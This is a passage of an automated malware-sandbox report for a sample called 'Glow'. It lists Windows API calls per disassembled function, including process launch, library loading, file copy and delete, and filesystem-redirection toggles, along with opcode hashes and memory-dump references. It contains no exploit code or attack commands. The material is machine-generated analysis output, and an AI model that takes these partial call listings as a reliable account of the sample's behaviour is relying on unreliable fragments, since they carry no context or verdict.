                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 839392675-0
                                                                                                                                                                          • Opcode ID: c303db6e15c11a1f44203540148a450473147697a6b8644be44a2718b35efb8c
                                                                                                                                                                          • Instruction ID: 357209f0a40d062b081a64a33e0524d0e3297d0df6baaa3a506b2c9015824c7c
                                                                                                                                                                          • Opcode Fuzzy Hash: c303db6e15c11a1f44203540148a450473147697a6b8644be44a2718b35efb8c
                                                                                                                                                                          • Instruction Fuzzy Hash: 0CF054B2641158BFE72157529C0EEEF7F7CEFC6B11F004068F611D1190D7A45A01C6B9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetClientRect.USER32(?), ref: 003C34EF
                                                                                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 003C3506
                                                                                                                                                                          • GetWindowDC.USER32(?), ref: 003C3512
                                                                                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 003C3521
                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 003C3533
                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 003C354D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 272304278-0
                                                                                                                                                                          • Opcode ID: 04d19596a2fbf3f0e0c1a6d9afbbe05444ae5564cab1915a88d3d549fc4ed110
                                                                                                                                                                          • Instruction ID: 43492c5400fde92060b0983e25f304218c56e5bae85560d5379cd59622718934
                                                                                                                                                                          • Opcode Fuzzy Hash: 04d19596a2fbf3f0e0c1a6d9afbbe05444ae5564cab1915a88d3d549fc4ed110
                                                                                                                                                                          • Instruction Fuzzy Hash: B9012471900215FFDB516FA4DC08FEA7BB6FB09321F518174FA2AA21A1CB311E52AB14
                                                                                                                                                                          APIs
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003E21CC
                                                                                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 003E21D8
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 003E21E1
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 003E21E9
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 003E21F2
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 003E21F9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 146765662-0
                                                                                                                                                                          • Opcode ID: cc30a9079b66a6b5add1a83a0bc1397f184291ccfac3a00e11157bcb09b9dccb
                                                                                                                                                                          • Instruction ID: 1396be86fe46366549f41e302f3cdcc42218aefa2fc0a3df24f8833f59415cdf
                                                                                                                                                                          • Opcode Fuzzy Hash: cc30a9079b66a6b5add1a83a0bc1397f184291ccfac3a00e11157bcb09b9dccb
                                                                                                                                                                          • Instruction Fuzzy Hash: 2AE0E5B6804109BBDB012FA1EC0C98AFF39FF49322B108230F625820B0CB329420DB58
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 0040B903
                                                                                                                                                                            • Part of subcall function 003841EA: _wcslen.LIBCMT ref: 003841EF
                                                                                                                                                                          • GetProcessId.KERNEL32(00000000), ref: 0040B998
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040B9C7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                          • String ID: <$@
                                                                                                                                                                          • API String ID: 146682121-1426351568
                                                                                                                                                                          • Opcode ID: 2d1941353be91c23d567c263306c602de6cc9f375b774b9c4dbc14c8320a08f2
                                                                                                                                                                          • Instruction ID: f7d3f5e999fe371e8d68e9574996e23c528d8c0c8b52d381b0df240804a7c335
                                                                                                                                                                          • Opcode Fuzzy Hash: 2d1941353be91c23d567c263306c602de6cc9f375b774b9c4dbc14c8320a08f2
                                                                                                                                                                          • Instruction Fuzzy Hash: 22714A75A00215DFCB15EF54C494A9EBBF5FF08310F0484AAE855AB3A1CB74ED45CB98
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003E7B6D
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003E7BA3
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003E7BB4
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003E7C36
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                          • String ID: DllGetClassObject
                                                                                                                                                                          • API String ID: 753597075-1075368562
                                                                                                                                                                          • Opcode ID: 6f47c2d2bb420da8101059bcfee2fef181b26cafb7694ec544ef0f19f5c5a717
                                                                                                                                                                          • Instruction ID: 278833eb5bed33616dbe2de88fa348de163665dc8a245e78532d3a0fc399cb2f
                                                                                                                                                                          • Opcode Fuzzy Hash: 6f47c2d2bb420da8101059bcfee2fef181b26cafb7694ec544ef0f19f5c5a717
                                                                                                                                                                          • Instruction Fuzzy Hash: E341E3B1604264EFDB16CF65C884A9A7BBDEF44300F2082A9EC069F285D7B0DD40DBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004148D1
                                                                                                                                                                          • IsMenu.USER32(?), ref: 004148E6
                                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0041492E
                                                                                                                                                                          • DrawMenuBar.USER32 ref: 00414941
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 3076010158-4108050209
                                                                                                                                                                          • Opcode ID: a04d2e719388f2e533507372d54b8ba8b2611e390246dda21339f237125ea9a8
                                                                                                                                                                          • Instruction ID: c0428fdc4b6cedce32f97c46adfe6b38935470730f496556e834161a2a55f116
                                                                                                                                                                          • Opcode Fuzzy Hash: a04d2e719388f2e533507372d54b8ba8b2611e390246dda21339f237125ea9a8
                                                                                                                                                                          • Instruction Fuzzy Hash: 9B416AB5A10209EFDB10CF61D984AEBBBB9FF46324F04812AE9459B350C334ED85CB64
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                            • Part of subcall function 003E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 003E4620
                                                                                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003E27B3
                                                                                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003E27C6
                                                                                                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 003E27F6
                                                                                                                                                                            • Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 2081771294-1403004172
                                                                                                                                                                          • Opcode ID: 32f7d42697a5951411a8b448d52cf47537bacca3a537fa8540b976d3ebee23ed
                                                                                                                                                                          • Instruction ID: c870662c2f1b5d21a942019cee55e1bba74bf7d2a3974231cc4a1baddba702df
                                                                                                                                                                          • Opcode Fuzzy Hash: 32f7d42697a5951411a8b448d52cf47537bacca3a537fa8540b976d3ebee23ed
                                                                                                                                                                          • Instruction Fuzzy Hash: C5210776900254BEDB06AB61DC45DFFB7BCDF46360B108229F421AB1E1DB784909D750
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00413A29
                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00413A30
                                                                                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00413A45
                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00413A4D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                          • String ID: SysAnimate32
                                                                                                                                                                          • API String ID: 3529120543-1011021900
                                                                                                                                                                          • Opcode ID: 403de2f6478663454b943190a476cd9e580528e9a23d40c90388d69a8f11c908
                                                                                                                                                                          • Instruction ID: 53d5fda557201252a0bf8d34c916028ce3b34b7323c40346130a8037d7fa440f
                                                                                                                                                                          • Opcode Fuzzy Hash: 403de2f6478663454b943190a476cd9e580528e9a23d40c90388d69a8f11c908
                                                                                                                                                                          • Instruction Fuzzy Hash: 5C21F3B1600205AFEF109F64DC80FFB37A9EF453A5F10522AFA90922D0C375CD819768
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00419A5D
                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00419A72
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00419ABA
                                                                                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00419AF0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                          • String ID: (E
                                                                                                                                                                          • API String ID: 2864067406-3218771753
                                                                                                                                                                          • Opcode ID: b611920788181f77a177f30778a5e1273389b1a25294cf594541514100e825b3
                                                                                                                                                                          • Instruction ID: e67cf636e41eebe397ea3096118afcedf242e1d6014a6295992b38b0eda1d3ac
                                                                                                                                                                          • Opcode Fuzzy Hash: b611920788181f77a177f30778a5e1273389b1a25294cf594541514100e825b3
                                                                                                                                                                          • Instruction Fuzzy Hash: 6021EF70A00158AFCF258F94C868EEF3BB9EF0A390F444066F9054B2A1C3B99D94DB64
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00381AF4
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 003C31F9
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 003C3203
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 003C320E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                          • String ID: (E
                                                                                                                                                                          • API String ID: 4127811313-3218771753
                                                                                                                                                                          • Opcode ID: 43180bc783722a44af5ded62e59f6bbeffb4566001ac15eab5a6ec20d92766ed
                                                                                                                                                                          • Instruction ID: 3a85c30314738f916efe468d40d2edf5c346441644c568ba8d25c360436e8152
                                                                                                                                                                          • Opcode Fuzzy Hash: 43180bc783722a44af5ded62e59f6bbeffb4566001ac15eab5a6ec20d92766ed
                                                                                                                                                                          • Instruction Fuzzy Hash: 74116A71A01119AFCF15EFA4C9859EE77B8EB05340F004496E902E7141C774BA82CBA5
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,003A508E,?,?,003A502E,?,004498D8,0000000C,003A5185,?,00000002), ref: 003A50FD
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003A5110
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,003A508E,?,?,003A502E,?,004498D8,0000000C,003A5185,?,00000002,00000000), ref: 003A5133
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                          • Opcode ID: b2e0af2ea4a2562402d5d80ce30840353b102c66d2dce64888bc86217900127a
                                                                                                                                                                          • Instruction ID: 34ff62d7a4d90f4381c2a5b3ecfa8b363638d2024fc12bd0e495d3bf0fd555e9
                                                                                                                                                                          • Opcode Fuzzy Hash: b2e0af2ea4a2562402d5d80ce30840353b102c66d2dce64888bc86217900127a
                                                                                                                                                                          • Instruction Fuzzy Hash: D0F0C274E00218BBDB159F94DC09BEDBFB4EF48712F004075F809A2160DB349E40CB98
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0038668B,?,?,003862FA,?,00000001,?,?,00000000), ref: 0038664A
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0038665C
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,0038668B,?,?,003862FA,?,00000001,?,?,00000000), ref: 0038666E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                          • API String ID: 145871493-3689287502
                                                                                                                                                                          • Opcode ID: de42d3c942450b7b1b72b878ca6889bfcd8be5bc5f0d62dab73d245e9d4d7489
                                                                                                                                                                          • Instruction ID: 364c172eb914b580b85ce80719f34bddf815a63a3a29b1b6eff4489857b3e562
                                                                                                                                                                          • Opcode Fuzzy Hash: de42d3c942450b7b1b72b878ca6889bfcd8be5bc5f0d62dab73d245e9d4d7489
                                                                                                                                                                          • Instruction Fuzzy Hash: FCE08675A016226792122725AC09B9A65289F82B22B064265FD04D2108EB68CC0181EC
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,003C5657,?,?,003862FA,?,00000001,?,?,00000000), ref: 00386610
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00386622
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,003C5657,?,?,003862FA,?,00000001,?,?,00000000), ref: 00386635
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                          • API String ID: 145871493-1355242751
                                                                                                                                                                          • Opcode ID: 23686f5f0dc5bfe22df6190875339753ba2a08e8b9047cbf45698ab18e947e85
                                                                                                                                                                          • Instruction ID: 30e20882141af0010edb9bb1b0d7d3caf86737a60057d03d9ded7c61a571c858
                                                                                                                                                                          • Opcode Fuzzy Hash: 23686f5f0dc5bfe22df6190875339753ba2a08e8b9047cbf45698ab18e947e85
                                                                                                                                                                          • Instruction Fuzzy Hash: 56D0C231A0267177422337206D09BCF2A159ED1B1130A4061B804A2118EF28CC0182DC
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003F35C4
                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 003F3646
                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003F365C
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003F366D
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003F367F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Delete$Copy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3226157194-0
                                                                                                                                                                          • Opcode ID: 05f8f0cc73b79bb23398fcea95e3d349c0acf40b35a4845558a1e42eda6831a7
                                                                                                                                                                          • Instruction ID: 072c453d01a8f09d4649df68e0349bccd672b3ed7e010b2b8783f6c11da4b6ca
                                                                                                                                                                          • Opcode Fuzzy Hash: 05f8f0cc73b79bb23398fcea95e3d349c0acf40b35a4845558a1e42eda6831a7
                                                                                                                                                                          • Instruction Fuzzy Hash: F1B13271D0121DABDF16EBA4CC85EEEB77DEF49314F0040A6F609EA151EB349B448B61
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0040AE87
                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0040AE95
                                                                                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0040AEC8
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040B09D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
